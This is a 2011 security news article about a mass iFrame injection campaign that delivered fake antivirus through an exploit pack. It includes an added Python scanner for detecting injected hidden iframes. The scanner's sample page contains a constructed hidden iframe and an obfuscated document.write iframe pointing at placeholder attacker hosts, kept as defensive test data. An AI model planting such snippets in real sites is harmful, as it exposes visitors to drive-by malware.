Mass injection attack compromised 20,000+ domains, delivers fake AV
Posted on 18 August 2011.
A simple mistake on the part of the attackers has revealed another mass malicious iFrame injection attack that is currently under way, say Armorize's researchers.

Initially, they omitted the tag that should have enclosed the malicious code, so the script text was rendered as ordinary page content, indexed by Google and, therefore, searchable. The initial count was around 22,400 compromised domains and 536,000+ infected pages.

Unfortunately, the attackers remedied their mistake and the injected script is not visible to Google anymore, so the current number of affected pages is unknown.

What is known is that the script takes the victims through a number of redirection sites and lands them on a page where a drive-by download script is served by a modified version of the BlackHole exploit pack.

The exploit pack takes advantage of vulnerabilities in the Windows OS, Java, Adobe Reader and Flash Player to install a fake AV solution on the victim's computer. The malware is executed immediately and begins scaring the user with bogus infection warnings.

The fake solution changes its name depending on the OS it encounters on the targeted computer. It is "XP Security 2012" under Windows XP, "Vista Antivirus 2012" under Windows Vista, and "Win 7 Antivirus 2012" under Windows 7.

According to the researchers, the redirecting domains are hosted in Moldova, and the exploit servers in the US. As for how legitimate sites get injected with the malicious iFrame, they say it is mostly done with stolen FTP credentials.
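Because the injected code is no longer visible to search engines, and because the attackers are writing it straight into site files over FTP, site owners have to look for it in their own content. The following scanner is an added example, not Armorize's tooling or anything from the original report: it parses HTML pages and flags iframes that point at a third-party host, are sized 1x1 or smaller, or are hidden with inline CSS, and it also flags inline scripts that assemble an iframe at runtime (document.write plus unescape/fromCharCode), which is how this kind of injection is usually obfuscated. The sample page, the site host `www.example.com` and the `.invalid` attacker hostnames are all constructed for the example.

```python
"""Heuristic scanner for injected hidden iframes in a site's HTML (added example)."""
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-style tricks commonly used to keep an injected iframe out of sight.
HIDDEN_STYLE = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none|(left|top)\s*:\s*-\d", re.I)
# Script constructs typically used to build an iframe at runtime so that a
# plain grep for "<iframe" in the file misses it.
SCRIPT_MARKERS = re.compile(
    r"document\.write|unescape\s*\(|fromCharCode|%3Ciframe", re.I)


def _tiny(value):
    """True for a width/height attribute of 0 or 1 (with or without units)."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 1


class IframeAuditor(HTMLParser):
    """Collects suspicious iframes and iframe-building scripts as findings."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._script_line = None   # line of the <script> currently being read
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script_line = self.getpos()[0]
            self._script_buf = []
        elif tag == "iframe":
            self._check_iframe({k: (v or "") for k, v in attrs})

    def handle_data(self, data):
        if self._script_line is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_line is not None:
            body = "".join(self._script_buf)
            if "iframe" in body.lower() and SCRIPT_MARKERS.search(body):
                self.findings.append({"kind": "script", "line": self._script_line,
                                      "src": None,
                                      "reasons": ["script assembles an iframe at runtime"]})
            self._script_line = None

    def _check_iframe(self, a):
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        # An iframe to a host outside the site is not proof of injection, but
        # combined with the other signals it almost always is.
        if host and host != self.site_host and not host.endswith("." + self.site_host):
            reasons.append("third-party src host " + host)
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("tiny dimensions %sx%s" % (a.get("width", "?"), a.get("height", "?")))
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden via style")
        if reasons:
            self.findings.append({"kind": "iframe", "line": self.getpos()[0],
                                  "src": src, "reasons": reasons})


def audit_html(html, site_host):
    """Return the list of findings for one page; empty list means nothing flagged."""
    parser = IframeAuditor(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


def audit_tree(root, site_host, exts=(".html", ".htm", ".php")):
    """Walk a web root (e.g. a fresh download of the site over FTP) and audit every page."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = audit_html(fh.read(), site_host)
                if findings:
                    report[path] = findings
    return report


# Constructed sample page: one legitimate embed, one injected hidden iframe and
# one obfuscated script that writes another iframe. Hostnames are placeholders.
SAMPLE_PAGE = """<html><head><title>Shop</title></head>
<body>
<iframe src="https://www.example.com/player" width="640" height="360"></iframe>
<p>Welcome</p>
<iframe src="http://redirector.invalid/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://stage2.invalid/x.php%22 width=1 height=1%3E%3C/iframe%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for f in audit_html(SAMPLE_PAGE, "www.example.com"):
        print("line %d: %s %s -> %s" % (f["line"], f["kind"], f["src"] or "",
                                        ", ".join(f["reasons"])))
```

This is a heuristic, not an integrity check: it will miss injections that use other hiding tricks or that live in server-side templates rather than the rendered HTML. Comparing the live files against a known-good copy (and rotating the FTP credentials the attackers used) is the more reliable cleanup.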

Unfortunately, the malware served has a very low detection rate (11.6 percent on VirusTotal), so endpoint antivirus alone cannot be relied on to stop it. The best defense against this type of threat is to keep all software up to date, above all the components the exploit kit targets (Windows, Java, Adobe Reader and Flash Player), so that the drive-by download has nothing left to exploit.

COPYRIGHT 1998-2014 BY HELP NET SECURITY.